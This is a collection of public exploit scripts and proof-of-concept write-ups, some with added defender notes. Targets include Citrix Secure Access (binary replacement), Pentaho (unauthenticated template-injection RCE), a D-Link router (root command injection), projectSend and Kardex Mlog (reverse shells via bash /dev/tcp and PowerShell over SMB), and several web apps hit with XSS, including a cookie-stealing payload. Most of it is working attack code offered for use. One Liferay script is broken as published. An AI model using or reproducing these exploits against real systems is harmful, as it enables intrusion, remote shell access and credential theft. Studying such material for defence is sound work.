//Discovered by:: TOUHAMI KASBAOUI - VXREMALWARE
//Discover date : 25/03/2023
//Reported to Citrix: 25/03/2023
//Tested Version: 22.2.1.103, 23.1.1.11/Last version
//Exploit: https://github.com/sqrtZeroKnowledge/Citrix_Secure_Access_LPE_0DAY
//
// Proof of concept: replaces ROUTE.exe inside the Citrix Secure Access Client
// install directory with a caller-supplied PE image. The service lookup that
// precedes the write is informational only; the write happens regardless of
// its result.
// Defender notes: the target is a fixed path under "C:\Program Files", which a
// standard user normally cannot modify. The report calls this a local
// privilege escalation, so presumably a weak directory ACL and/or the installer
// later executing ROUTE.exe is what makes it exploitable -- confirm against the
// linked writeup. Creation or modification of that file by anything other than
// the Citrix installer is the observable to alert on.


#define UNICODE
#define _UNICODE
#include <Windows.h>
#include <string>
#include <iostream>
#include <Windows.h>   // duplicate of the include above; harmless because of the header guard
#include <iostream>    // duplicate as well

using namespace std;

// Outcome of ServiceExists(). The two serviceManager_* values describe a failed
// OpenSCManager(); the service_* values describe the OpenService() call.
enum Result
{
    unknown,                              // unmapped Win32 error from either call
    serviceManager_AccessDenied,          // OpenSCManager -> ERROR_ACCESS_DENIED
    serviceManager_DatabaseDoesNotExist,  // OpenSCManager -> ERROR_DATABASE_DOES_NOT_EXIST
    service_AccessDenied,                 // OpenService -> ERROR_ACCESS_DENIED
    service_InvalidServiceManagerHandle,  // OpenService -> ERROR_INVALID_HANDLE
    service_InvalidServiceName,           // OpenService -> ERROR_INVALID_NAME
    service_DoesNotExist,                 // OpenService -> ERROR_SERVICE_DOES_NOT_EXIST
    service_Exist                         // OpenService succeeded
};

// Reports whether a service named `serviceName` is registered in the active
// services database. Only GENERIC_READ access is requested on both handles.
// Every handle that was opened is closed before returning.
Result ServiceExists(const std::wstring& serviceName)
{
    Result r = unknown;

    SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);

    if (manager == NULL)
    {
        DWORD lastError = GetLastError();

        // Early returns leak nothing: no handle has been opened at this point.
        if (lastError == ERROR_ACCESS_DENIED)
            return serviceManager_AccessDenied;
        else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)
            return serviceManager_DatabaseDoesNotExist;
        else
            return unknown;
    }

    SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);

    if (service == NULL)
    {
        DWORD error = GetLastError();

        if (error == ERROR_ACCESS_DENIED)
            r = service_AccessDenied;
        else if (error == ERROR_INVALID_HANDLE)
            r = service_InvalidServiceManagerHandle;
        else if (error == ERROR_INVALID_NAME)
            r = service_InvalidServiceName;
        else if (error == ERROR_SERVICE_DOES_NOT_EXIST)
            r = service_DoesNotExist;
        else
            r = unknown;
    }
    else
        r = service_Exist;

    if (service != NULL)
        CloseServiceHandle(service);

    if (manager != NULL)   // always true here (the NULL case returned above); kept for symmetry
        CloseServiceHandle(manager);

    return r;
}

int main() {

    // 7168-byte buffer for the PE image to drop. Only the first 32 bytes are
    // given (starting with the "MZ" DOS-header magic); the remaining elements
    // are zero-initialised by aggregate initialisation. "shellcode" is a
    // misnomer -- per the author's comment this is meant to hold a whole PE
    // file. uint8_t is not included explicitly; it relies on <cstdint> being
    // pulled in transitively by the headers above.
    const uint8_t shellcode[7168] = {
        0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
        0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    }; //You can set array bin of your reverse shell PE file here

    // Informational only: the result is printed but never gates the file write
    // below. What "aoservice" refers to is not stated in this file.
    std::wstring serviceName = L"aoservice";
    Result result = ServiceExists(serviceName);
    if (result == service_Exist)
        std::wcout << L"The service '" << serviceName << "' exists." << std::endl;
    else if (result == service_DoesNotExist)
        std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;
    else
        std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;

    // CREATE_ALWAYS replaces any existing ROUTE.exe; share mode 0 requests
    // exclusive access. The status line is printed before the handle is
    // validated, so it appears even when the open failed.
    HANDLE fileHandle = CreateFile(L"C:\\Program Files\\Citrix\\Secure Access Client\\ROUTE.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    cerr << "[*] Loading Malicious file into Citric Secure Access Installer \n";
    if (fileHandle == INVALID_HANDLE_VALUE) {
        cerr << "Failed to create shellcode\n";
        return 1;
    }

    // bytesWritten is received but never compared with sizeof(shellcode), so a
    // short write would still be reported as success.
    DWORD bytesWritten;
    if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {
        cerr << "Failed to write to file\n";
        CloseHandle(fileHandle);
        return 1;
    }
    CloseHandle(fileHandle);

    cout << "Shellcode exported to Citrix Secure Access path \n";
    return 0;
}
# Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)
# Author: dwbzn
# Date: 2022-04-04
# Vendor: https://www.hitachivantara.com/
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
# Version: Pentaho BA Server 9.3.0.0-428
# CVE: CVE-2022-43769, CVE-2022-43939
# Tested on: Windows 11
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).

# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)
#
# Defender notes: the whole exploit is one unauthenticated GET, so it is easy
# to match in access logs or at a reverse proxy -- the path
# /api/ldap/config/ldapTreeNodeChildren/ with a `url` query parameter that
# contains "%23{" (URL-encoded "#{") and "T(java.lang.Runtime)". The trailing
# "require.js" segment is presumably the authentication-bypass half of the
# chain (see the Credits link) -- confirm there. The mitigation is the vendor
# fix for the two CVEs above, not a string block alone.
import requests
import argparse

parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
# nargs='?' without const: "--cmd" given with no value stores None, not the default.
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
args = parser.parse_args()

# Expression-language payload carried in the `url` parameter; the doubled
# braces are f-string escapes that produce literal "{" and "}".
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"

print ("running...")
r = requests.get(url)
# The only success signal is a response body equal to 'false'; nothing here
# verifies that the command actually ran.
if r.text == 'false':
    print ("command should've executed! nice.")
else:
    print ("didn't work. sadge...")
<pre><code># Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability <br /># Google Dork: NA<br /># Date: 30/01/2023<br /># Exploit Author: Françoa Taffarel<br /># Vendor Homepage:<br />https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suporte<br />https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip<br /># Software Link:<br />https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip<br /># Version: DIR846enFW100A53DBR-Retail<br /># Tested on: D-LINK DIR-846<br /># CVE : CVE-2022-46552<br /><br />D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote<br />command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist<br />parameter. This vulnerability is exploited via a crafted POST request. The parameter value<br />evidently reaches a shell unescaped: the $(id>rce_confirmed) command substitution in the<br />request below is executed, and the follow-up request returns uid=0(root), so the command<br />runs as root. Note that the request shown carries a session cookie and an HNAP_AUTH header,<br />i.e. it was issued from an authenticated session.<br /><br />### Malicious POST Request<br />```<br />POST /HNAP1/ HTTP/1.1<br />Host: 192.168.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101<br />Firefox/107.0<br />Accept: application/json<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/json<br />SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"<br />HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285<br />Content-Length: 171<br />Origin: http://192.168.0.1<br />Connection: close<br />Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775<br />Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;<br />PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4<br /><br />{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}<br />```<br /><br /><br />### Response<br /><br />```<br />HTTP/1.1 200 OK<br />X-Powered-By: PHP/7.1.9<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Content-type: text/html; charset=UTF-8<br />Connection: close<br />Date: Thu, 
01 Dec 2022 11:03:54 GMT<br />Server: lighttpd/1.4.35<br />Content-Length: 68<br /><br />{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}<br />```<br /><br /><br />### Data from RCE Request<br /><br />```<br />GET /HNAP1/rce_confirmed HTTP/1.1<br />Host: 192.168.0.1<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101<br />Firefox/107.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;<br />PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /><br />### Response<br /><br />```<br />HTTP/1.1 200 OK<br />Content-Type: application/octet-stream<br />Accept-Ranges: bytes<br />Content-Length: 24<br />Connection: close<br />Date: Thu, 01 Dec 2022 23:24:28 GMT<br />Server: lighttpd/1.4.35<br /><br />uid=0(root) gid=0(root)<br />```<br /><br /></code></pre>
<pre><code>Exploit Title: projectSend r1605 - Remote Code Execution (RCE)<br />Application: projectSend<br />Version: r1605<br />Bugs: RCE via file extension manipulation<br />Technology: PHP<br />Vendor URL: https://www.projectsend.org/<br />Software Link: https://www.projectsend.org/<br />Date found: 26-01-2023<br />Author: Mirabbas Ağalarov<br />Tested on: Linux <br />POC video: https://youtu.be/Ln7KluDfnk4<br /><br />2. Technical Details & POC<br />========================================<br /><br />1. The attacker first creates a txt file and pastes the following code. Next, the attacker changes the file extension to jpg, because the system does not allow php, sh, exe etc. files. <br /><br />bash -i >& /dev/tcp/192.168.100.18/4444 0>&1<br /><br />2. Then the attacker starts a listener on the IP and port: <br /> nc -lvp 4444<br /> <br />3. When the file is uploaded, the upload makes the HTTP request below; the file name should be like this: openme.sh;jpg<br /><br /><br /><br />POST /includes/upload.process.php HTTP/1.1<br />Host: localhost<br />Content-Length: 525<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-platform: "Linux"<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI<br />Accept: */*<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/upload.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59<br />Connection: close<br /><br />------WebKitFormBoundary0enbZuQQAtahFVjI<br />Content-Disposition: form-data; name="name"<br /><br />openme.sh;jpg<br />------WebKitFormBoundary0enbZuQQAtahFVjI<br />Content-Disposition: form-data; name="chunk"<br /><br />0<br 
/>------WebKitFormBoundary0enbZuQQAtahFVjI<br />Content-Disposition: form-data; name="chunks"<br /><br />1<br />------WebKitFormBoundary0enbZuQQAtahFVjI<br />Content-Disposition: form-data; name="file"; filename="blob"<br />Content-Type: application/octet-stream<br /><br />bash -i >& /dev/tcp/192.168.100.18/4444 0>&1<br /><br />------WebKitFormBoundary0enbZuQQAtahFVjI--<br /><br /><br />4.In the second request, we do this to the filename section at the bottom.<br /><br />openme.sh<br /><br /><br />POST /files-edit.php?ids=34 HTTP/1.1<br />Host: localhost<br />Content-Length: 1016<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/files-edit.php?ids=34&type=new<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59<br />Connection: close<br /><br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="csrf_token"<br /><br />66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][id]"<br /><br />34<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][original]"<br /><br />openme.sh;.jpg<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br 
/>Content-Disposition: form-data; name="file[1][file]"<br /><br />1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][name]"<br /><br />openme.sh<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][description]"<br /><br /><br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="file[1][expiry_date]"<br /><br />25-02-2023<br />------WebKitFormBoundaryc8btjvyb3An7HcmA<br />Content-Disposition: form-data; name="save"<br /><br /><br />------WebKitFormBoundaryc8btjvyb3An7HcmA--<br /><br /><br />The second request changes the stored name to openme.sh without the extension being rejected again, which indicates the extension check is enforced only at upload time and not when a file is edited. Both requests are sent from a logged-in session (PHPSESSID cookie), so an account that is allowed to upload files is required.<br /><br />It does not matter who downloads the file: if they open it, the reverse shell is triggered and code execution follows.<br /><br /><br />Private YouTube video PoC: https://youtu.be/Ln7KluDfnk4<br /><br /></code></pre>
<pre><code># Exploit Title: Monitorr v1.7.6 - Cross Site Scripting<br /># CVE: CVE-2023-26776<br /># Exploit Author: Achuth V P (retrymp3)<br /># Date: February 09, 2023<br /># Vendor Homepage: https://github.com/Monitorr/<br /># Software Link: https://github.com/Monitorr/Monitorr<br /># Tested on: Ubuntu<br /># Version: v1.7.6<br /># Exploit Description: Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.<br /><br />An attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service set to something like: <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script><br />The injected script tag is executed every time the home page is loaded, because the title is stored and rendered without escaping.<br /></code></pre>
# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990
#
# Reviewer note: as published, this script does not run unmodified. It mixes
# Python 2 print statements ("print req", "print cook") with Python 3 print()
# calls, two string literals below are split across a line break (a syntax
# error in either version), and the if/else bodies appear unindented in the
# published copy. Functionally it is a reachability check: it GETs the bundled
# CKEditor file-manager page and treats an HTTP 200 as "vulnerable". Nothing
# is uploaded; the `inject` query string is built but never sent.

import requests
import json

# Line break inside the string literal kept as published.
print (" Search this on Google #Dork for liferay
-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")

# "URL Goes Here" is a placeholder the operator is expected to replace with the
# portal base URL; this literal is likewise split by a line break.
url ="URL Goes Here
/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"
req = requests.get(url)
print req
sta = req.status_code
if sta == 200:
    print ('Life Vulnerability exists')
    cook = url
    print cook
    # Built but never used: the file-upload action is not exercised.
    inject = "Command=FileUpload&Type=File&CurrentFolder=/"
    #cook_inject = cook+inject
    #print cook_inject
else:
    print ('not found try a another method')


print ("solution restrict access and user groups")
<pre><code># Exploit Title: Stored XSS in uptime-kuma <= v1.19.6<br /># CVE: CVE-2023-26777<br /># Exploit Author: Achuth V P (retrymp3)<br /># Date: February 09, 2023<br /># Vendor Homepage: https://github.com/louislam/<br /># Software Link: https://github.com/louislam/uptime-kuma<br /># Tested on: Ubuntu<br /># Version: <= v1.19.6<br /># Exploit Description: Stored Cross Site Scripting vulnerability found in Uptime Kuma v.1.19.6 and before allows a remote attacker to execute arbitrary JavaScript code via the description, title, footer, and incident creation parameters of the status page in the application.<br /><br />Create a status page and, when entering the title or the description, use the payload: <script>""</script><script>alert("XSS")</script><br />Whenever anyone loads the page, the JavaScript inside the script tag is executed.<br /></code></pre>
<pre><code># Exploit Title: Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)<br /># Date: 2022-05-25<br /># Exploit Author: Mostafa Farzaneh<br /># WPScan page:<br />https://wpscan.com/vulnerability/95f92062-08ce-478a-a2bc-6d026adf657c<br /># Vendor Homepage: https://wordpress.org/plugins/cp-multi-view-calendar/<br /># Software Link:<br />https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.4.06.zip<br /># Version: 1.4.06<br /># Tested on: Linux<br /># CVE : CVE-2022-2846<br /># Description:<br />The Calendar Event Multi View WordPress plugin before 1.4.07 does not have<br />any authorisation and CSRF checks in place when creating an event, and is<br />also lacking sanitisation as well as escaping in some of the event fields.<br />This could allow unauthenticated attackers to create arbitrary events and<br />put Cross-Site Scripting payloads in it.<br /><br />#POC and exploit code:<br />As an unauthenticated user, to add a malicious event (on October 6th, 2022)<br />to the calendar with ID 1, open the code below<br /><br /><html><br /> <body><br /> <form action="<br />https://example.com/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails"<br />method="POST"><br /> <input type="hidden" name="Subject"<br />value='"><script>alert(/XSS/)</script>' /><br /> <input type="hidden" name="colorvalue" value="#f00" /><br /> <input type="hidden" name="rrule" value="" /><br /> <input type="hidden" name="rruleType" value="" /><br /> <input type="hidden" name="stpartdate" value="10/6/2022" /><br /> <input type="hidden" name="stparttime" value="00:00" /><br /> <input type="hidden" name="etpartdate" value="10/6/2022" /><br /> <input type="hidden" name="etparttime" value="00:00" /><br /> <input type="hidden" name="stpartdatelast" value="10/6/2022" /><br /> <input type="hidden" name="etpartdatelast" value="10/6/2022" /><br /> <input type="hidden" name="stparttimelast" value="" /><br /> <input 
type="hidden" name="etparttimelast" value="" /><br /> <input type="hidden" name="IsAllDayEvent" value="1" /><br /> <input type="hidden" name="Location" value="CSRF" /><br /> <input type="hidden" name="Description" value='<p style="text-align:<br />left;">CSRF</p>' /><br /> <input type="hidden" name="timezone" value="4.5" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br />The XSS will be triggered when viewing the related event<br /><br /></code></pre>
<pre><code># Exploit Title: Sales Tracker Management System v1.0 - Sensitive information disclosure<br /># CVE: CVE-2023-26774<br /># Exploit Author: Achuth V P (retrymp3)<br /># Date: February 08, 2023<br /># Vendor Homepage: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code<br /># Tested on: Ubuntu, Apache, Mysql<br /># Vendor: oretnom23<br /># Version: v1.0<br /># Exploit Description: An issue found in Sales Tracker Management System v.1.0 allows a remote attacker to access sensitive information via the sales.php component of the admin/reports endpoint.<br /><br />Browsing to <application base url>/admin/reports/sales.php<br />returns the content of the sales.php page, which should only be accessible to the admin.<br /></code></pre>
#!/usr/bin/env python3

# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
# Date: 12/13/2022
# Exploit Author: Patrick Hener
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center
# Version: 5.7.12+0-a203c2a213-master
# Tested on: Windows Server 2016
# CVE : CVE-2023-22855
# Writeup: https://hesec.de/posts/CVE-2023-22855
#
# You will need to run a netcat listener beforehand: ncat -lnvp <port>
#
# Defender notes, from the requests this script sends: the server accepts a
# backslash path in the URL and serves the local file it names (probe() reads
# \Windows\win.ini -- "File Inclusion" in the script's own words), and the
# same handler accepts a UNC path (\\host\share\file), which makes the server
# fetch a .t4 template from an attacker-controlled SMB share and, per the CVE
# title, evaluate it (the writeup covers the template engine side).
# Observables: HTTP requests to the Mlog server whose path contains "\\" or
# ends in ".t4", and outbound SMB (445/tcp) from the server to an external
# host. Egress filtering of SMB from the server blocks the delivery step.
import requests, argparse, base64, os, threading
from impacket import smbserver   # third-party dependency, not standard library

def probe(target):
    """Return True if `target` serves \\Windows\\win.ini when it is requested as
    a URL path; "fonts" is used as the marker, presumably because win.ini
    contains a [fonts] section. This is the check main() gates on."""
    headers = {
        "Accept-Encoding": "deflate"
    }
    res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)
    if "fonts" in res.text:
        return True
    else:
        return False

def gen_payload(lhost, lport):
    """Return the T4 template text that the target is later made to include.

    The template's C# block starts cmd.exe with Verb = "runas" and passes it
    a base64-encoded PowerShell command that connects back to lhost:lport."""
    rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
    # `powershell -e` expects base64 of the UTF-16LE encoding of the command.
    rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))
    payload = f"""<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>
<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>"""

    return payload

def start_smb_server(lhost):
    """Serve the current directory (where main() writes exploit.t4) as share
    "SHARE" on lhost:445, with SMB2 enabled and an empty challenge.
    start() presumably blocks, which is why main() runs this on a thread."""
    server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
    server.addShare("SHARE", os.getcwd(), '')
    server.setSMB2Support(True)
    server.setSMBChallenge('')
    server.start()

def trigger_vulnerability(target, lhost):
    """Request a UNC path on `target` that points at exploit.t4 on the SMB
    share; the response is not inspected."""
    headers = {
        "Accept-Encoding": "deflate"
    }

    requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)

def main():
    """Command-line entry point: probe, write exploit.t4 to the working
    directory, start the SMB server, wait for the operator, trigger, exit."""
    # Well, args
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='Target host url', required=True)
    parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)
    parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)
    args = parser.parse_args()

    # Probe if target is vulnerable
    print("[*] Probing target")
    if probe(args.target):
        print("[+] Target is alive and File Inclusion working")
    else:
        print("[-] Target is not alive or File Inclusion not working")
        exit(-1)

    # Write payload to file
    print("[*] Writing 'exploit.t4' payload to be included later on")
    with open("exploit.t4", 'w') as template:
        template.write(gen_payload(args.lhost, args.lport))

    template.close()   # redundant: the with-block has already closed the file

    # Start smb server in background
    print("[*] Starting SMB Server in the background")
    smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))
    smb_server_thread.start()

    # Rev Shell reminder
    print("[!] At this point you should have spawned a rev shell listener")
    print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")
    print("[?] Are you ready to trigger the vuln? Then press enter!")
    input() # Wait for input then continue

    # Trigger vulnerability
    print("[*] Now triggering the vulnerability")
    trigger_vulnerability(args.target, args.lhost)

    # Exit
    print("[+] Enjoy your shell. Bye!")
    os._exit(1)   # hard exit so the non-daemon SMB server thread cannot keep the process alive



if __name__ == "__main__":
    main()